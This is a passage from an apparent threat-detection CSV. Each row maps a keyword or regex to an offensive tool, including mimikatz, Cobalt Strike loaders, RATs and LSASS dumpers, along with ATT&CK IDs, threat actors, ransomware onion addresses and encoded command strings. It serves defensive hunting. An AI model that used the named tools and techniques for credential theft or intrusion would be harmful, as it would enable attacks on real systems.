pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50656" "*kuhl_m_sekurlsa_nt6.h*",".{0,1000}kuhl_m_sekurlsa_nt6\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50657" "*kuhl_m_sekurlsa_packages.c*",".{0,1000}kuhl_m_sekurlsa_packages\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50658" "*kuhl_m_sekurlsa_packages.h*",".{0,1000}kuhl_m_sekurlsa_packages\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50659" "*kuhl_m_sekurlsa_utils.c*",".{0,1000}kuhl_m_sekurlsa_utils\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50660" "*kuhl_m_sekurlsa_utils.c*",".{0,1000}kuhl_m_sekurlsa_utils\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","50661" "*kuhl_m_sekurlsa_utils.h*",".{0,1000}kuhl_m_sekurlsa_utils\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50662" "*kuipersupport@onionmail.org*",".{0,1000}kuipersupport\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50663" "*kwallet2john.py*",".{0,1000}kwallet2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50664" "*kyleavery/AceLdr*",".{0,1000}kyleavery\/AceLdr.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for 
memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","50665" "*kyleavery/inject-assembly*",".{0,1000}kyleavery\/inject\-assembly.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 
- T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","50666" "*kyleavery/pendulum*",".{0,1000}kyleavery\/pendulum.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","95","11","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z","50667" "*L e G e N d - O f - S i R - D o O o M - R a T - THE HELL*",".{0,1000}L\se\sG\se\sN\sd\s\-\sO\sf\s\-\sS\si\sR\s\-\sD\so\sO\so\sM\s\-\sR\sa\sT\s\-\sTHE\sHELL.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","50668" "*L""NanoDumpPwd""*",".{0,1000}L\""NanoDumpPwd\"".{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privileged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","50669" "*'l', 's', 'a', 's', 's', '.', 'e', 'x', 'e'*",".{0,1000}\'l\',\s\'s\',\s\'a\',\s\'s\',\s\'s\',\s\'\.\',\s\'e\',\s\'x\',\s\'e\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","50670" "*'l','s','a','s','s','.','e','x','e'*",".{0,1000}\'l\',\'s\',\'a\',\'s\',\'s\',\'\.\',\'e\',\'x\',\'e\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","50671" "*L04DUr118(h00k*",".{0,1000}L04DUr118\(h00k.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50673"
"*L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsICI=*",".{0,1000}L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsICI\=.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#base64","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","50674" "*l0n3m4n/CVE-2024-22274-RCE*",".{0,1000}l0n3m4n\/CVE\-2024\-22274\-RCE.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","1","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","50675" "*L0phtCrack*",".{0,1000}L0phtCrack.{0,1000}","offensive_tool_keyword","L0phtCrack","L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations. networked servers. primary domain controllers. or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. 
visit the L0phtCrack homepage.","T1003 - T1110 - T1212 - T1552 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://www.l0phtcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50676" "*l33th4x0r=cm91dGluZyBwYWNrZXQ=*",".{0,1000}l33th4x0r\=cm91dGluZyBwYWNrZXQ\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#base64","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","50677" "*l3m0n/WinPirate*",".{0,1000}l3m0n\/WinPirate.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - 
T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","50678" "*L3NhbSBvciAvc2lkIHRvIHRhcmdldCB0aGUgYWNjb3VudCBpcyBuZWVkZWQ=*",".{0,1000}L3NhbSBvciAvc2lkIHRvIHRhcmdldCB0aGUgYWNjb3VudCBpcyBuZWVkZWQ\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50679" "*L3NhbSBvciAvc2lkIHRvIHRhcmdldCB0aGUgYWNjb3VudCBpcyBuZWVkZWQ=*",".{0,1000}L3NhbSBvciAvc2lkIHRvIHRhcmdldCB0aGUgYWNjb3VudCBpcyBuZWVkZWQ\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50680" "*L3Vzci9iaW4vd2hvYW1p*",".{0,1000}L3Vzci9iaW4vd2hvYW1p.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt. whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement.
privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","Black Basta","Collection","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A","50681" "*l55ysq5qjpin2vq23ul3gc3h62vp4wvenl7ov6fcn65vir7kc7gb5fyd.onion*",".{0,1000}l55ysq5qjpin2vq23ul3gc3h62vp4wvenl7ov6fcn65vir7kc7gb5fyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50682" "*LABEL name=""Maitm""*",".{0,1000}LABEL\sname\=\""Maitm\"".{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","50683" "*label-implant *",".{0,1000}label\-implant\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","50684" "*Ladon * AllScan*",".{0,1000}Ladon\s.{0,1000}\sAllScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50685" "*Ladon * 
CiscoScan*",".{0,1000}Ladon\s.{0,1000}\sCiscoScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50686" "*Ladon * 